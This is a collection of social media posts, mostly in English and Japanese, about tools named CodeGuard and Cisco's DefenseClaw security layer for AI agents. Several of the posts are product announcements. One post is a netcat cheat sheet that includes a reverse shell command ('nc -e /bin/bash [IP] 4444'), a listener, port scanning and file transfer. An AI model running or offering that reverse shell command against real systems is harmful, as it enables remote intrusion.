元々 ・CodeGuard for Borland C 4.5J ・Borland PowerPack for DOS の 2 行だったけど、何かを削除しようとした際に間違っちゃった (・ω<) てへぺろ みたいな感じですかねぇ。 Borland C/C の歴史なら『CB Magazine』のがいいかも。 blogs.itmedia.co.jp/mohno/CB…

今更ですが [ボーランド言語製品履歴] の『CodeGuard for Borland C 4.5J』のトコ、内容的に『Borland PowerPack for DOS』の間違いじゃないかって思いました (^^;A [ボーランド言語製品履歴] web.archive.org/web/19970603…

DefenseClaw — Security Governance for AI Agents & MCP Ecosystems 🛡️💀 A defensive security platform designed to govern, inspect, and audit agentic AI runtimes before and during execution. Built by Cisco AI Defense for organizations deploying AI agents, MCP servers, plugins, and autonomous workflows. • Admission control for skills, MCP servers, plugins & generated code • Runtime inspection of prompts, completions & tool calls • Built-in CodeGuard static analysis • OpenShell sandbox integration • External registry ingestion (Smithery, Skills.sh, Git, ClawHub) • Policy-based blocking and enforcement • SQLite, JSONL, OTLP & Splunk audit logging • Operator CLI, TUI dashboard & observability stack Key capabilities: 🔍 Scan AI capabilities before execution 🛡️ Enforce runtime guardrails and policies 📊 Generate durable audit evidence for compliance and investigations ⚙️ Monitor agent behavior, tool usage, and sandbox activity in real time Designed for enterprises building secure AI agent infrastructure and MCP-powered ecosystems. 🔗 github.com/cisco-ai-defense/… #AISecurity #CyberSecurity #AgenticAI #MCP #LLMSecurity #OpenClaw #DevSecOps #InfoSec #Cisco #ArtificialIntelligence

Agent tools shouldn’t run first and get reviewed later. DefenseClaw is a security governance layer for OpenClaw and agentic AI runtimes. It helps you scan untrusted agent capabilities before use, inspect runtime traffic, and keep durable audit evidence when policy decisions matter. Key features: • Admission control – scans skills, MCP servers, plugins, and generated code before they run • Runtime guardrails – inspects prompts, completions, and tool calls with rules, policy, optional LLM judge, and Cisco AI Defense inspection • CodeGuard checks – looks for secrets, dangerous execution, unsafe deserialization, weak crypto, injection patterns, and risky file access • OpenShell sandbox support – adds network, filesystem, syscall, and policy controls for Linux sandbox setups • Audit and observability – exports evidence through SQLite, JSONL, OTLP, Splunk HEC, webhooks, and TUI views It’s open-source (Apache 2.0 license). Link in the reply 👇

**Bringing Enterprise Grade Security and Guardrails to NetClaw: A 3-Ring Security Architecture** When you give an AI agent access to your network infrastructure, security isn't optional - it's essential. Today I'm excited to share how we've made NetClaw enterprise-ready with a 3-ring defense-in-depth architecture combining NVIDIA OpenShell and Cisco DefenseClaw. --- **The 3 Rings:** **Ring 1: NVIDIA OpenShell** Container-based sandbox isolation. NetClaw runs in a Docker container with: - Isolated file system, network, and process namespaces - YAML-based network policies - deny by default - Only explicitly allowed APIs are reachable (Slack, LLMs, your MCPs) **Ring 2: Cisco DefenseClaw** Runtime guardrails that inspect everything: - Scans ALL skills and MCPs with CodeGuard before execution - Inspects every LLM prompt and completion (7 AI providers) - Filters all tool calls through 6 security rule categories - Full audit logging with SIEM export **Ring 3: NetClaw** Your AI network engineer, now running in a protected environment with full audit trails. --- **Why This Matters:** We scanned all 186 NetClaw skills and 56 MCP servers with DefenseClaw. Every skill now declares its required MCPs. Every MCP was tested for: - Hardcoded credentials - Shell injection vectors - SQL injection vulnerabilities - Unsafe deserialization Defense-in-depth means if one layer fails, the others still protect you. --- **One Command to Deploy:** ``` ./scripts/netclaw-secure-start.sh ``` That's it. OpenShell gateway, DefenseClaw guardrails, sandbox creation, config migration, network policy - all automated. --- **The Result:** An AI agent that can automate your network with the security posture your enterprise requires: - Container isolation - Runtime inspection - Compliance logging - SIEM integration youtu.be/rDpgEVsZGH0 --- NetClaw: AI-powered network automation with enterprise-grade security. YouTube: #NetworkAutomation #AISafety #EnterpriseSecurity #DevOps #Cisco #NVIDIA #AIAgent #InfrastructureAsCode #Compliance #NetOps #LLM #Claude #Anthropic #OpenShell #DefenseClaw #ContainerSecurity #RuntimeSecurity #AuditLogging #SIEM #Splunk #Datadog

CiscoがRSA Conference 2026に合わせて、AIエージェントフレームワーク向けのセキュリティガバナンスツール「DefenseClaw」を発表。 2025年11月のローンチ後、1月下旬に爆発的に広まり、1月末までに管理不在のまま急拡大していたOpenClawを受けたもので、NVIDIAもGTC 2026でOpenClawエコシステム向けのソフトウェアスタック「NemoClaw」を発表していた経緯。 DefenseClawは3月27日にGitHubでOSS公開予定。 Cisco自身の調査では、企業のエージェントAIプロジェクトのうちテストから本番に移行できたのはわずか5%にとどまっており、ガバナンス層の不在が導入の足かせになっているとの認識が背景に。 【DefenseClawの概要】 ・OpenClawなどのエージェント環境に組み込むセキュリティレイヤー。NVIDIAのサンドボックスOpenShellやCisco自身のスキャンツール群（Skills Scanner、MCP Scanner、AI BoM、CodeGuardなど）と連携する設計 ・機能は3つ。(1)スキル・プラグイン・エージェント生成コードの実行前スキャン、(2)エージェントの入出力メッセージのランタイム監視、(3)ブロックリストに登録されたスキルやMCPサーバーのアドミッションゲートによるブロック ・同時に発表されたCisco AI Defense: Explorer Editionは、エージェントワークフローを駆動するモデルやエージェントアプリケーションに対してプロンプトインジェクションやジェイルブレイクへの耐性をテストする、マルチターンの敵対的テスト機能を提供 ・エージェントごとにゼロトラストのID検証・アクセス制御を適用するCisco Secure Accessの拡張や、開発段階からポリシー適用を埋め込むランタイムSDKも併せて公開 ・なお、同じRSAC 2026でのCisco発表にはSplunkを活用したSOC向けエージェント機能の強化も含まれているが、これはDefenseClaw本体の機能とは別立ての発表 同種の取り組みはPalo Alto NetworksやZscalerなどのセキュリティ企業、JFrogやGitLabなどのDevOps系、さらにAnthropic・OpenAI・Googleも手がけており、競合の多い領域。 Ciscoの企業ネットワークにおける既存シェアがどこまで差別化要因になるかは未知数ですが、OpenClawエコシステムなどの拡大速度を考えると、ガバナンス層の整備は引き続き急務といえそうです。 newsroom.cisco.com/c/r/newsr…

Cisco just redefined agent security at RSA 2026 Day 1. The stat that matters: 85% of enterprises experiment with AI agents. Only 5% deploy them. The gap? Security. Cisco's answer — three pillars: 1️⃣ Protect the world FROM agents → Zero Trust Access extended to agents → Agent Identity Management in Duo (register agents, map to human owners) → MCP gateway routing ALL tool traffic — no blind spots → Identity Intelligence discovers shadow agents 2️⃣ Protect agents FROM the world → AI Defense: Explorer Edition (free red-teaming) → Multi-turn adversarial testing for agentic workflows → DefenseClaw: open-source framework (Skills Scanner MCP Scanner AI BoM CodeGuard) → Integrates with NVIDIA OpenShell sandbox 3️⃣ Respond at machine speed → Splunk agentic SOC: automated triage, detection, malware reversing → Agents defending against agents The architecture insight: "AI agents aren't just making work faster — they're a new workforce of co-workers." New co-workers need onboarding. Identity. Accountability. Access control. Cisco's treating agents like employees — not tools. Every agent mapped to a human manager. Time-bound access. Intent-aware monitoring. MCP policy enforcement. This is the ten-layer defense stack completed: runtime → network → identity → browser → hardware attestation → data-layer → agentic graph → autonomous SOC → network observability → Zero Trust agent IAM None existed as products 12 months ago. All shipping now. #AIAgents #RSA2026 #ZeroTrust

Your coding agent has no idea what secure code looks like. @Cisco built CodeGuard to change that. Two things that make it work: 1. security skills packaged as context for any coding agent 2. works across Cursor, Windsurf, Claude Code Full episode in comments.

Your AI coding agent learned from millions of lines of code, including insecure ones. That means by default, it can write vulnerable code too. So how do you fix that? @JohnGroetzinger, Principal Engineer at @Cisco, built CodeGuard, a security skills layer that teaches coding agents how to write and review code securely. He tested it against real scenarios. The result: 84% success rate vs 47% baseline. Nearly 2× improvement. In this episode we get into: • how CodeGuard works • why Cisco open sourced it • the surprisingly simple method that gets agents to fix their own mistakes Try CodeGuard: cisco/software-security on the Tessl registry. (0:00) Trailer (2:07) Introduction (4:46) Defining Code Guard: Security Skills for AI (6:33) AI Culture at Cisco: Balancing Creativity & Security (7:55) The Evolution of Tooling vs. LLM Models (9:09) From OWASP Rules to Agent Skills (12:48) Challenges of Distribution Across Different IDEs (15:48) Tips for Increasing Agent Skill Activation (20:25) Measuring Success: The Tessl Evaluation Journey (24:41) Navigating Enterprise-Grade Security Scenarios (28:15) How to Build an AI Skill from Scratch (31:59) The Future of Code Guard & Open Source

Major milestone: @Cisco has donated Project CodeGuard to the Coalition for Secure AI (CoSAI), an OASIS Open Project.

CodeGuard - Security Skills and Rules for AI Coding Agents - github.com/cosai-oasis/proje… Project CodeGuard is an AI model-agnostic security coding agent skills framework and ruleset that embeds secure-by-default practices into AI coding workflows (generation and review). It ships core security skills and rules, translators for popular coding agents, and validators to test skills and rule compliance. Why Project CodeGuard? AI coding agents are transforming software engineering, but this speed can introduce security vulnerabilities. Is your AI coding agent implementation introducing security vulnerabilities? •Skipping input validation •Hardcoding secrets and credentials •Using weak cryptographic algorithms •Relying on unsafe functions •Missing authentication/authorization checks •Missing any other security best practice Project CodeGuard solves this by embedding security best practices directly into AI coding agent workflows.

AI coding tools hallucinate. Everyone knows it. Nobody fixed it. So I built CodeGuard — a truth-anchored memory layer that sits between Claude and your codebase. Point it at a folder → 198 files → 11,898 verified facts → ask anything. If it can't prove it, it won't say it. Watch it run live 👇

AI coding tools hallucinate. Everyone knows it. Nobody fixed it. So I built CodeGuard — a truth-anchored memory layer that sits between Claude and your codebase. Point it at a folder → 198 files → 11,898 verified facts → ask anything. If it can't prove it, it won't say it. Watch it run live 👇

Finally, we can scale AI code generation without scaling our security debt. Project CodeGuard gives us the framework: Model-Agnostic Security Ruleset 🛡️ Automated Guardrails for Gen & Review ✅ This isn't an add-on; it's the required foundation for enterprise AI development. 🔗 Link in the first comment 👇

Secure #AI #coding is critical for resilient AI ecosystems. Cisco’s open-source Project CodeGuard sets a new standard. Learn more from Cisco Distinguished Engineer Omar Santos ➡️ cs.co/6017C44Ol

#EACL 2026 #Hot Start to the year 🎉 Excited to share that our paper “CodeGuard: Improving LLM Guardrails in CS Education” has been accepted to Findings of EACL 2026 🇲🇦 (Rabat, Morocco • Mar 24–29, 2026) 🗓️

#Pysec Netcat's Mastery: A Hacker's Swiss Army Knife 🔪 📖 Connection and Scanning: nc [IP] [port] — connect to the host. nc -lnvp 4444 — listen for incoming connections. nc -z [IP] 20-100 — quickly scan ports. nc -u [IP] [port] — work over UDP. File Transfer: nc -l -p 4444 > file.txt — receive the file. nc [IP] 4444 < file.txt — send the file. Reverse Shell: nc -e /bin/bash [IP] 4444 — send a shell. nc -lnvp 4444 — catch a shell on your side. Debugging: nc -vz [IP] 443 — check if the port is open. echo "GET /" | nc site.com 80 — manual HTTP request. Flags: -n — do not resolve DNS. -v — detailed output. -w 3 — timeout of 3 seconds. -k — do not close after disconnection. Fact: Netcat was written in 1995 by the hacker Hobbit. It's so versatile that it's called the "TCP/IP Swiss Army Knife". 😈 CodeGuard: PySec Edition | Chat

記事を投稿しました！ 生成AIコーディングエージェント CodeGuard で脆弱なアプリを修正してみた [Security] on #Qiita qiita.com/sig666/items/abcb5…